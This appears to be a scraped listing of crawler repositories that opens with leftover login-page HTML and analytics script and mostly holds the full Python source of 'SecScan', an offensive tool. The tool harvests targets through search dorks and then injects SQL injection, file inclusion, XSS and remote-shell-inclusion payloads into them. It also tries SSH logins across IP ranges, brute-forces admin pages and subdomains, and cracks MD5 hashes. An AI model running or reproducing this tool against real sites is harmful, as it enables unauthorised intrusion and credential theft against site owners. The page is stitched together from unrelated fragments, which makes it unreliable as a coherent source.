href="https://wallace-best.com/profile/signup/?next=http%3A//wallace-best.wallace-best.com/admin/moderate/" data-analytics="create-account"> Create an Account </a> </span> <h1 class="or-login">Alternatively, you can log in using:</h1> <div class="connect-options"> <button title="facebook" type="button" class="facebook-auth"> <span class="auth-container"> <img src="//a.wallace-bestdn.com/1391808583/img/icons/facebook.svg" alt="Facebook"> <!--[if lte IE 7]> <img src="//a.wallace-bestcdn.com/1391808583/img/icons/facebook.png" alt="Facebook"> <![endif]--> </span> </button> <button title="twitter" type="button" class="twitter-auth"> <span class="auth-container"> <img src="//a.wallace-bestdn.com/1391808583/img/icons/twitter.svg" alt="Twitter"> <!--[if lte IE 7]> <img src="//a.wallace-bestcdn.com/1391808583/img/icons/twitter.png" alt="Twitter"> <![endif]--> </span> </button> <button title="google" type="button" class="google-auth"> <span class="auth-container"> <img src="//a.wallace-bestdn.com/1391808583/img/icons/google.svg" alt="Google"> <!--[if lte IE 7]> <img src="//a.wallace-bestcdn.com/1391808583/img/icons/google.png" alt="Google"> <![endif]--> </span> </button> </div> </form> </section> <div class="get-disqus"> <a href="https://wallace-best.com/admin/signup/" data-analytics="get-disqus">Get wallace-best for your site</a> </div> <script> /*jshint undef:true, browser:true, maxlen:100, strict:true, expr:true, white:true */ // These must be global var _comscore, _gaq; (function (doc) { "use strict"; // Convert Django template variables to JS variables var debug = false, gaKey = '', gaPunt = '', gaCustomVars = { component: 'website', forum: '', version: 'v5' }, gaSlots = { component: 1, forum: 3, version: 4 }; /**/ gaKey = gaCustomVars.component == 'website' ? 'UA-1410476-16' : 'UA-1410476-6'; // Now start loading analytics services var s = doc.getElementsByTagName('script')[0], p = s.parentNode; var isSecure = doc.location.protocol == 'https:'; if (!debug) { _comscore = _comscore || []; // comScore // Load comScore _comscore.push({ c1: '7', c2: '10137436', c3: '1' }); var cs = document.createElement('script'); cs.async = true; cs.src = (isSecure ? 'https://sb' : 'http://b') + '.scorecardresearch.com/beacon.js'; p.insertBefore(cs, s); } // Set up Google Analytics _gaq = _gaq || []; if (!debug) { _gaq.push(['_setAccount', gaKey]); _gaq.push(['_setDomainName', '.wallace-best.com']); } if (!gaPunt) { for (var v in gaCustomVars) { if (!(gaCustomVars.hasOwnProperty(v) && gaCustomVars[v])) continue; _gaq.push(['_setCustomVar', gaSlots[v], gaCustomVars[v]]); } _gaq.push(['_trackPageview']); } // Load Google Analytics var ga = doc.createElement('script'); ga.type = 'text/javascript'; ga.async = true; var prefix = isSecure ? 'https://ssl' : 'http://www'; // Dev tip: if you cannot use the Google Analytics Debug Chrome extension, // https://chrome.google.com/webstore/detail/jnkmfdileelhofjcijamephohjechhna // you can replace /ga.js on the following line with /u/ga_debug.js // But if you do that, PLEASE DON'T COMMIT THE CHANGE! Kthxbai. ga.src = prefix + '.google-analytics.com/ga.js'; p.insertBefore(ga, s); }(document)); </script> <script> (function (){ // adds a classname for css to target the current page without passing in special things from the server or wherever // replacing all characters not allowable in classnames var newLocation = encodeURIComponent(window.location.pathname).replace(/[\.!~*'\(\)]/g, '_'); // cleaning up remaining url-encoded symbols for clarity sake newLocation = newLocation.replace(/%2F/g, '-').replace(/^-/, '').replace(/-$/, ''); if (newLocation === '') { newLocation = 'homepage'; } $('body').addClass('' + newLocation); }()); $(function ($) { // adds 'page-active' class to links matching the page url $('a[href="' + window.location.pathname + '"]').addClass('page-active'); }); $(document).delegate('[data-toggle-selector]', 'click', function (e) { var $this = $(this); $($this.attr('data-toggle-selector')).toggle(); e.preventDefault(); }); </script> <script type="text/javascript"> wallace-best.define('web.urls', function () { return { twitter: 'https://wallace-best.com/_ax/twitter/begin/', google: 'https://wallace-best.com/_ax/google/begin/', facebook: 'https://wallace-best.com/_ax/facebook/begin/', dashboard: 'http://wallace-best.com/dashboard/' } }); $(document).ready(function () { var usernameInput = $("input[name=username]"); if (usernameInput[0].value) { $("input[name=password]").focus(); } else { usernameInput.focus(); } }); </script> <script type="text/javascript" src="//a.wallace-bestcdn.com/1391808583/js/src/social_login.js"> <script type="text/javascript"> $(function() { var options = { authenticated: (context.auth.username !== undefined), moderated_forums: context.auth.moderated_forums, user_id: context.auth.user_id, track_clicks: !!context.switches.website_click_analytics, forum: context.forum }; wallace-best.funnelcake.init(options); }); </script> <!-- helper jQuery tmpl partials --> <script type="text/x-jquery-tmpl" id="profile-metadata-tmpl"> data-profile-username="${username}" data-profile-hash="${emailHash}" href="/${username}" </script> <script type="text/x-jquery-tmpl" id="profile-link-tmpl"> <a class="profile-launcher" {{tmpl "#profile-metadata-tmpl"}} href="/${username}">${name}</a> </script> <script src="//a.wallace-bestcdn.com/1391808583/js/src/templates.js"></script> <script src="//a.wallace-bestcdn.com/1391808583/js/src/modals.js"></script> <script> wallace-best.ui.config({ disqusUrl: 'https://disqus.com', mediaUrl: '//a.wallace-bestcdn.com/1391808583/' }); </script> </body> </html>
czs0x55aa
爱奇艺视频信息的爬虫
tjscollins
Web crawler that runs axe-core accessibility tests on the urls it collects
udinparla
#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYm0le');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nm0le@tormail.org\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main()
dlutwuwei
A crawler can use different strategy to different url pattern
leopardslab
CrawlerX - Develop Extensible, Distributed, Scalable Crawler System which is a web platform that can be used to crawl URLs in different kind of protocols in a distributed way.
trevery
a python crawler to scrap books' downloading urls from allitebooks.com
PushpenderIndia
Ragno is a Passive URL Crawler | Written in Python3 | Fetches URLs from the Wayback Machine, AlienVault's Open Threat Exchange & Common Crawl
arbuckle
Python-driven web crawler and scraper. Uses BeautifulSoup to gather all URLs from a target page, and initiates a crawl from a start URL, considering Whitelist/Blacklist criteria that are populated in crawl.py
wx-chevalier
Cendertron = Crawler + cendertron, Crawl AJAX-heavy client-side Single Page Applications (SPAs), deploying with docker, focusing on scraping requests(page urls, apis, etc.), followed by pentest tools(Sqlmap, etc.). Cendertron can be used for extracting requests(page urls, apis, etc.) from your Web 2.0 page.
pixlie
A smart web crawler built in Rust that uses Claude AI to select the most relevant URLs from website sitemaps based on crawling objectives.
ElektroStudios
Desktop app that crawls urls from Google's search engine results
yogesh-desai
It is a web crawler and scrapper for https://www.Tokopedia.com. The project scrape the product-ID, product URL and product videos present under the product images present at right bottom of the page.
WING-NUS
Kairos, combines a focused crawler and an information extraction engine, to convert a list of conference websites into a index filled with fields of metadata that correspond to individual papers. Using event date metadata extracted from the conference website, Kairos proactively harvests metadata about the individual papers soon after they are made public. We use a Maximum Entropy classifier to classify uniform resource locators (URLs) as scientific conference websites and use Conditional Random Fields (CRF) to extract individual paper metadata from such websites. The crawler is built on top of the popular open-source crawler Nutch.
Input list of keywords, crawler top (url, title, description) data from Google Search.